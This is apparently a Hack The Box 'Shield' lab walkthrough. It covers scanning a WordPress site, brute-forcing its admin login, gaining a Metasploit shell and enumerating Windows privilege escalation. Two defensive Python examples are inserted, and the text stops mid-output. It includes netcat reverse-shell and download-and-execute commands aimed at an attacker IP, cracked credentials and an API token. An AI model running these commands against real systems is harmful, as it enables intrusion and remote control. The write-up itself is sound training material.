Shield
HTB - Shield
nmap -T4 -A -p- 10.10.10.29
kali@kali:~$ nmap -T4 -A -p- 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 17:10 EDT
Nmap scan report for 10.10.10.29
Host is up (0.47s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 643.75 seconds
Nessus scan, just for fun: start the daemon with sudo /etc/init.d/nessusd start and go to https://kali:8834
Enumerate HTTP
Ran sudo nikto -h http://10.10.10.29
kali@kali:~$ sudo nikto -h http://10.10.10.29
[sudo] password for kali:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.29
+ Target Hostname: 10.10.10.29
+ Target Port: 80
+ Start Time: 2020-05-04 17:16:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2020-05-04 18:12:15 (GMT-4) (3359 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~$ sudo nikto -h http://10.10.10.29/wordpress
[sudo] password for kali:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.29
+ Target Hostname: 10.10.10.29
+ Target Port: 80
+ Start Time: 2020-05-04 18:41:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.10.29/wordpress/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.10.29/wordpress/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 3 error(s) and 8 item(s) reported on remote host
+ End Time: 2020-05-04 19:11:11 (GMT-4) (1779 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Visit http://10.10.10.29
Subdirectory brute force with gobuster: gobuster dir -u http://10.10.10.29/ -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt (another possible wordlist: /usr/share/wordlists/dirb/common.txt)
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.29/
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/04 17:27:45 Starting gobuster
===============================================================
/wordpress (Status: 301)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/people: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/aboutus: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/new: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/sports: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/buttons: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/image: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/blogs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/products: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/events: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/music: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/474: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/Top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:13 [!] net/http: request canceled (Client.Timeout exceeded while reading body)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/Logos: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/infobox: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/994: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/777: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:16 [!] Get http://10.10.10.29/su: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/WordPress (Status: 301)
[ERROR] 2020/05/04 17:30:21 [!] Get http://10.10.10.29/category3: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/Wordpress (Status: 301)
===============================================================
2020/05/04 17:34:53 Finished
===============================================================
WordPress install found at /wordpress/
Run wpscan:
wpscan --update
wpscan --url 10.10.10.29/wordpress/ --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Output:
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29]
[+] Started: Mon May 4 17:38:24 2020
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.29/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.29/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.29/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.29/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
| - http://10.10.10.29/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
|
| [!] 18 vulnerabilities identified:
|
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
| - https://hackerone.com/reports/339483
|
| [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9864
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://fortiguard.com/zeroday/FG-VD-18-165
| - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
| Fixed in: 5.2.5
| References:
| - https://wpvulndb.com/vulnerabilities/9973
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
|
| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
| Fixed in: 5.2.5
| References:
| - https://wpvulndb.com/vulnerabilities/9975
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://hackerone.com/reports/509930
| - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
|
| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
| Fixed in: 5.2.5
| References:
| - https://wpvulndb.com/vulnerabilities/9976
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
|
| [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
| Fixed in: 5.2.5
| References:
| - https://wpvulndb.com/vulnerabilities/10004
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
|
| [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
| Fixed in: 5.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/10201
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47634/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
|
| [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
| Fixed in: 5.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/10202
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47635/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
| Fixed in: 5.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/10203
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47633/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block
| Fixed in: 5.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/10204
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47636/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh
|
| [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
| Fixed in: 5.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/10205
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47637/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
| Fixed in: 5.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/10206
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47638/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mesmerize-companion
| Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/
| Latest Version: 1.6.111
| Last Updated: 2020-04-10T15:01:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| The version could not be determined.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <==============================================================================> (21 / 21) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 48
[+] Finished: Mon May 4 17:38:40 2020
[+] Requests Done: 27
[+] Cached Requests: 36
[+] Data Sent: 6.36 KB
[+] Data Received: 18.56 KB
[+] Memory used: 175.391 MB
[+] Elapsed time: 00:00:15
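The scan above fingerprints WordPress 5.2.1 and lists each core finding with an affected range in its title and a branch-specific "Fixed in" line. As an added example (not part of the write-up or of WPScan), the following Python parses a constructed subset of those findings and turns them into a patch-gap answer for the detected version; the check against "Fixed in" is what keeps a backport release such as 5.2.6 from being flagged by the upstream range "<= 5.3".

```python
"""Patch-gap check from the WPScan core findings above.

Added example; not part of the original write-up or of WPScan. It parses the
affected range WPScan writes into each finding title ("<= 5.2.2", "5.0-5.2.2",
"< 5.4.1") together with the "Fixed in" line, then reports which findings still
apply to a given version and the lowest release on the detected branch that
closes all of them.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

Version = Tuple[int, ...]

# Constructed subset of the 18 findings in the scan output above (titles and
# "Fixed in" values copied from it, leading "| " kept as WPScan prints it).
WPSCAN_FINDINGS = """\
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 5.2.3
| [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
| Fixed in: 5.2.3
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
| Fixed in: 5.2.5
| [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
| Fixed in: 5.2.6
"""

# "WordPress <= 5.2.2 - name" or "WordPress 5.0-5.2.2 - name"
TITLE_RE = re.compile(
    r"^WordPress\s+(?:(?P<op><=|<)\s*(?P<hi>[\d.]+)|(?P<lo>[\d.]+)-(?P<hi2>[\d.]+))"
    r"\s+-\s+(?P<name>.+)$"
)


class Finding(NamedTuple):
    name: str
    low: Optional[Version]   # inclusive lower bound, None when the title has none
    high: Version            # upper bound of the upstream affected range
    high_inclusive: bool
    fixed_in: Version        # backported fix on the branch WPScan detected (5.2.x here)


def parse_version(s: str) -> Version:
    """'5.3' and '5.3.0' must compare equal, so pad to three components."""
    parts = [int(p) for p in s.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def parse_findings(text: str) -> List[Finding]:
    findings, title = [], None
    for raw in text.splitlines():
        line = raw.lstrip("| ").strip()
        if line.startswith("[!] Title: "):
            title = line[len("[!] Title: "):]
        elif line.startswith("Fixed in: ") and title is not None:
            m = TITLE_RE.match(title)
            if not m:
                raise ValueError(f"unrecognised title format: {title!r}")
            if m.group("op"):
                low, high, incl = None, parse_version(m.group("hi")), m.group("op") == "<="
            else:
                low, high, incl = parse_version(m.group("lo")), parse_version(m.group("hi2")), True
            findings.append(Finding(m.group("name"), low, high, incl,
                                    parse_version(line[len("Fixed in: "):])))
            title = None
    return findings


def affects(f: Finding, v: Version) -> bool:
    """Inside the upstream range AND below the branch fix. The second test is
    essential: 5.2.6 sits inside "<= 5.3" yet already carries the fix backported
    as 5.2.5. Only valid for versions on the branch WPScan scanned."""
    if f.low is not None and v < f.low:
        return False
    in_range = v <= f.high if f.high_inclusive else v < f.high
    return in_range and v < f.fixed_in


def applicable(version: str, text: str = WPSCAN_FINDINGS) -> List[str]:
    v = parse_version(version)
    return [f.name for f in parse_findings(text) if affects(f, v)]


def required_release(version: str, text: str = WPSCAN_FINDINGS) -> Optional[str]:
    """Lowest release that clears every applicable finding, or None if clean."""
    v = parse_version(version)
    fixes = [f.fixed_in for f in parse_findings(text) if affects(f, v)]
    return ".".join(map(str, max(fixes))) if fixes else None


if __name__ == "__main__":
    for name in applicable("5.2.1"):
        print("applies:", name)
    print("update to at least", required_release("5.2.1"))
```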
Enumerate Users: wpscan --url 10.10.10.29/wordpress/ --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:30 <=============================================================================> (10 / 10) 100.00% Time: 00:00:30
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
Bruteforce login: wpscan --url 10.10.10.29/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Login found to be admin:P@s5w0rd! (the password from the last box). Go to http://10.10.10.29/wordpress/wp-login.php and log in.
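From the defender's side, the brute force above leaves a dense run of POSTs to wp-login.php in the IIS logs. The following is an added example, not from the write-up: it parses constructed IIS W3C log lines, flags a client that crosses a per-window login-attempt threshold, and records whether a 302 (the redirect wp-login.php sends on a successful login) followed the burst. Field names follow the IIS W3C default; the paths and the WPScan user agent are taken from this page.

```python
"""Detect the wp-login.php brute force above in IIS W3C extended logs.

Added example, not part of the original write-up. It keeps POSTs to the
WordPress login endpoints (wp-login.php and, since WPScan reported XML-RPC
enabled, xmlrpc.php), counts them per client in a sliding window, and flags a
burst that is followed by a 302 (wp-login.php answers a failed login with 200
and a successful one with a 302 redirect to wp-admin).
"""
import datetime as dt
from collections import defaultdict, deque
from typing import Dict, List, NamedTuple

LOGIN_PATHS = {"/wordpress/wp-login.php", "/wordpress/xmlrpc.php"}


class Alert(NamedTuple):
    client_ip: str
    attempts: int            # login POSTs seen from this client in the whole log
    burst_start: str         # first POST of the window that crossed the threshold
    success_after_burst: bool


def build_sample_log() -> str:
    """Constructed sample (IIS logs in UTC): 12 failed logins two seconds apart
    from one client, then a success, plus one ordinary login from someone else."""
    fields = ("#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
              "cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus "
              "sc-win32-status time-taken")

    def row(ts: dt.datetime, ip: str, ua: str, status: int) -> str:
        return (f"{ts:%Y-%m-%d %H:%M:%S} 10.10.10.29 POST /wordpress/wp-login.php - 80 - "
                f"{ip} {ua} - {status} 0 0 120")

    t0 = dt.datetime(2020, 5, 4, 21, 40, 0)
    lines = [fields, row(t0 - dt.timedelta(minutes=5), "10.10.14.5", "Mozilla/5.0", 302)]
    lines += [row(t0 + dt.timedelta(seconds=2 * i), "10.10.14.173", "WPScan/3.8.1", 200)
              for i in range(12)]
    lines.append(row(t0 + dt.timedelta(seconds=30), "10.10.14.173", "WPScan/3.8.1", 302))
    return "\n".join(lines) + "\n"


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Map each data line onto the column names from the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows


def detect_login_bursts(text: str, threshold: int = 10, window_seconds: int = 60) -> List[Alert]:
    recent = defaultdict(deque)          # client -> POST timestamps inside the window
    attempts = defaultdict(int)
    bursts: Dict[str, dict] = {}
    for r in parse_w3c(text):
        if r["cs-method"] != "POST" or r["cs-uri-stem"] not in LOGIN_PATHS:
            continue
        ip = r["c-ip"]
        ts = dt.datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        attempts[ip] += 1
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:   # drop old entries
            q.popleft()
        if ip not in bursts and len(q) >= threshold:
            bursts[ip] = {"start": q[0], "success": False}
        if ip in bursts and r["sc-status"] == "302":           # login succeeded after the burst
            bursts[ip]["success"] = True
    return [Alert(ip, attempts[ip], b["start"].strftime("%Y-%m-%d %H:%M:%S"), b["success"])
            for ip, b in bursts.items()]


if __name__ == "__main__":
    for alert in detect_login_bursts(build_sample_log()):
        print(alert)
```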
Searching for "metasploit wordpress" yields https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
Exploit
sudo msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > set LPORT 443
msf > set payload php/meterpreter_reverse_tcp
msf > exploit
Upgrade to a more stable shell (nc.exe is fetched from the shell on the target; nc -lvp 1234 is the listener on the attacking machine):
wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
unzip netcat-win32-1.12.zip
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
sudo python3 -m http.server 80
meterpreter > shell
> iwr -outf nc.exe http://10.10.14.173/nc.exe
nc -lvp 1234
meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.173 1234"
Second way to upgrade (much better): change the payload to download-and-execute:
msf > set payload php/download_exec
msf > set url http://10.10.14.173/shell.exe
Create the executable: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.173 LPORT=443 -f exe > shell.exe
Run the web server: sudo python3 -m http.server 80
Open a handler to listen for the callback (LHOST must match the LHOST baked into shell.exe):
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
options
set LHOST 10.10.15.117
set LPORT 443
run
Sysinfo:
sysinfo
Computer : SHIELD
OS : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows
Privilege Escalation (Great Tutorial for Windows)
Find exploit:
Method 1: Priv esc suggester
search suggester
use 0
options
set session 1
run
Result:
[*] 10.10.10.29 - Collecting local exploits for x86/windows...
[*] 10.10.10.29 - 30 exploit checks are being tried...
[+] 10.10.10.29 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
Result: I tried ms16_032_secondary_logon_handle_privesc with x64 meterpreter after changing to x64 shell from 32 bit, but it did not work.
Method 2: Searching for "windows server 2016 privilege escalation exploit" yields https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges which points to ohpe/juicy-potato
Method 3: More automated searchers: Sherlock by rastamouse
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/sher.ps1 sher.ps1
msf shell > powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"
Output:
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
